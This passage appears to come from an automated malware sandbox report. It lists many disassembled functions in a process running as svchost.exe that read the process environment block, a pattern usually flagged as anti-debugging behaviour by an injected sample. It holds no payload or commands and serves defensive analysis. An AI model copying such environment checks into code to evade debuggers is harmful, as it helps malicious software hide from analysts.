          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03BAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03BAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03BAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB06F1 mov eax, dword ptr fs:[00000030h]4_2_03BB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB06F1 mov eax, dword ptr fs:[00000030h]4_2_03BB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]4_2_03B6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]4_2_03B6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E627 mov eax, dword ptr fs:[00000030h]4_2_03B4E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B66620 mov eax, dword ptr fs:[00000030h]4_2_03B66620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68620 mov eax, dword ptr fs:[00000030h]4_2_03B68620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3262C mov eax, dword ptr fs:[00000030h]4_2_03B3262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72619 mov eax, dword ptr fs:[00000030h]4_2_03B72619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE609 mov eax, dword ptr fs:[00000030h]4_2_03BAE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B62674 mov eax, dword ptr fs:[00000030h]4_2_03B62674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF866E mov eax, dword ptr fs:[00000030h]4_2_03BF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF866E mov eax, dword ptr fs:[00000030h]4_2_03BF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A660 mov eax, dword ptr fs:[00000030h]4_2_03B6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A660 mov eax, dword ptr fs:[00000030h]4_2_03B6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4C640 mov eax, dword ptr fs:[00000030h]4_2_03B4C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B545B1 mov eax, dword ptr fs:[00000030h]4_2_03B545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B545B1 mov eax, dword ptr fs:[00000030h]4_2_03B545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB05A7 mov eax, dword ptr fs:[00000030h]4_2_03BB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB05A7 mov eax, dword ptr fs:[00000030h]4_2_03BB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB05A7 mov eax, dword ptr fs:[00000030h]4_2_03BB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E59C mov eax, dword ptr fs:[00000030h]4_2_03B6E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B32582 mov eax, dword ptr fs:[00000030h]4_2_03B32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B32582 mov ecx, dword ptr fs:[00000030h]4_2_03B32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B64588 mov eax, dword ptr fs:[00000030h]4_2_03B64588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B325E0 mov eax, dword ptr fs:[00000030h]4_2_03B325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C5ED mov eax, dword ptr fs:[00000030h]4_2_03B6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C5ED mov eax, dword ptr fs:[00000030h]4_2_03B6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B365D0 mov eax, dword ptr fs:[00000030h]4_2_03B365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]4_2_03B6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]4_2_03B6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E5CF mov eax, dword ptr fs:[00000030h]4_2_03B6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E5CF mov eax, dword ptr fs:[00000030h]4_2_03B6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC6500 mov eax, dword ptr fs:[00000030h]4_2_03BC6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6656A mov eax, dword ptr fs:[00000030h]4_2_03B6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6656A mov eax, dword ptr fs:[00000030h]4_2_03B6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6656A mov eax, dword ptr fs:[00000030h]4_2_03B6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38550 mov eax, dword ptr fs:[00000030h]4_2_03B38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38550 mov eax, dword ptr fs:[00000030h]4_2_03B38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B644B0 mov ecx, dword ptr fs:[00000030h]4_2_03B644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]4_2_03BBA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B364AB mov eax, dword ptr fs:[00000030h]4_2_03B364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEA49A mov eax, dword ptr fs:[00000030h]4_2_03BEA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B304E5 mov ecx, dword ptr fs:[00000030h]4_2_03B304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A430 mov eax, dword ptr fs:[00000030h]4_2_03B6A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E420 mov eax, dword ptr fs:[00000030h]4_2_03B2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E420 mov eax, dword ptr fs:[00000030h]4_2_03B2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E420 mov eax, dword ptr fs:[00000030h]4_2_03B2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2C427 mov eax, dword ptr fs:[00000030h]4_2_03B2C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68402 mov eax, dword ptr fs:[00000030h]4_2_03B68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68402 mov eax, dword ptr fs:[00000030h]4_2_03B68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68402 mov eax, dword ptr fs:[00000030h]4_2_03B68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5A470 mov eax, dword ptr fs:[00000030h]4_2_03B5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5A470 mov eax, dword ptr fs:[00000030h]4_2_03B5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5A470 mov eax, dword ptr fs:[00000030h]4_2_03B5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBC460 mov ecx, dword ptr fs:[00000030h]4_2_03BBC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEA456 mov eax, dword ptr fs:[00000030h]4_2_03BEA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2645D mov eax, dword ptr fs:[00000030h]4_2_03B2645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5245A mov eax, dword ptr fs:[00000030h]4_2_03B5245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40BBE mov eax, dword ptr fs:[00000030h]4_2_03B40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40BBE mov eax, dword ptr fs:[00000030h]4_2_03B40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]4_2_03BE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]4_2_03BE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38BF0 mov eax, dword ptr fs:[00000030h]4_2_03B38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38BF0 mov eax, dword ptr fs:[00000030h]4_2_03B38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38BF0 mov eax, dword ptr fs:[00000030h]4_2_03B38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5EBFC mov eax, dword ptr fs:[00000030h]4_2_03B5EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]4_2_03BBCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]4_2_03BDEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B50BCB mov eax, dword ptr fs:[00000030h]4_2_03B50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B50BCB mov eax, dword ptr fs:[00000030h]4_2_03B50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B50BCB mov eax, dword ptr fs:[00000030h]4_2_03B50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30BCD mov eax, dword ptr fs:[00000030h]4_2_03B30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30BCD mov eax, dword ptr fs:[00000030h]4_2_03B30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30BCD mov eax, dword ptr fs:[00000030h]4_2_03B30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5EB20 mov eax, dword ptr fs:[00000030h]4_2_03B5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5EB20 mov eax, dword ptr fs:[00000030h]4_2_03B5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF8B28 mov eax, dword ptr fs:[00000030h]4_2_03BF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF8B28 mov eax, dword ptr fs:[00000030h]4_2_03BF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C02B57 mov eax, dword ptr fs:[00000030h]4_2_03C02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C02B57 mov eax, dword ptr fs:[00000030h]4_2_03C02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C02B57 mov eax, dword ptr fs:[00000030h]4_2_03C02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C02B57 mov eax, dword ptr fs:[00000030h]4_2_03C02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04B00 mov eax, dword ptr fs:[00000030h]4_2_03C04B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2CB7E mov eax, dword ptr fs:[00000030h]4_2_03B2CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B28B50 mov eax, dword ptr fs:[00000030h]4_2_03B28B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDEB50 mov eax, dword ptr fs:[00000030h]4_2_03BDEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE4B4B mov eax, dword ptr fs:[00000030h]4_2_03BE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE4B4B mov eax, dword ptr fs:[00000030h]4_2_03BE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC6B40 mov eax, dword ptr fs:[00000030h]4_2_03BC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC6B40 mov eax, dword ptr fs:[00000030h]4_2_03BC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFAB40 mov eax, dword ptr fs:[00000030h]4_2_03BFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD8B42 mov eax, dword ptr fs:[00000030h]4_2_03BD8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38AA0 mov eax, dword ptr fs:[00000030h]4_2_03B38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38AA0 mov eax, dword ptr fs:[00000030h]4_2_03B38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B86AA4 mov eax, dword ptr fs:[00000030h]4_2_03B86AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68A90 mov edx, dword ptr fs:[00000030h]4_2_03B68A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04A80 mov eax, dword ptr fs:[00000030h]4_2_03C04A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6AAEE mov eax, dword ptr fs:[00000030h]4_2_03B6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6AAEE mov eax, dword ptr fs:[00000030h]4_2_03B6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30AD0 mov eax, dword ptr fs:[00000030h]4_2_03B30AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B64AD0 mov eax, dword ptr fs:[00000030h]4_2_03B64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B64AD0 mov eax, dword ptr fs:[00000030h]4_2_03B64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B86ACC mov eax, dword ptr fs:[00000030h]4_2_03B86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B86ACC mov eax, dword ptr fs:[00000030h]4_2_03B86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B86ACC mov eax, dword ptr fs:[00000030h]4_2_03B86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B54A35 mov eax, dword ptr fs:[00000030h]4_2_03B54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B54A35 mov eax, dword ptr fs:[00000030h]4_2_03B54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA38 mov eax, dword ptr fs:[00000030h]4_2_03B6CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA24 mov eax, dword ptr fs:[00000030h]4_2_03B6CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5EA2E mov eax, dword ptr fs:[00000030h]4_2_03B5EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBCA11 mov eax, dword ptr fs:[00000030h]4_2_03BBCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BACA72 mov eax, dword ptr fs:[00000030h]4_2_03BACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BACA72 mov eax, dword ptr fs:[00000030h]4_2_03BACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA6F mov eax, dword ptr fs:[00000030h]4_2_03B6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA6F mov eax, dword ptr fs:[00000030h]4_2_03B6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA6F mov eax, dword ptr fs:[00000030h]4_2_03B6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDEA60 mov eax, dword ptr fs:[00000030h]4_2_03BDEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B40A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B40A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BB89B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BB89B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BB89B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B309AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B309AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B629F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B629F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
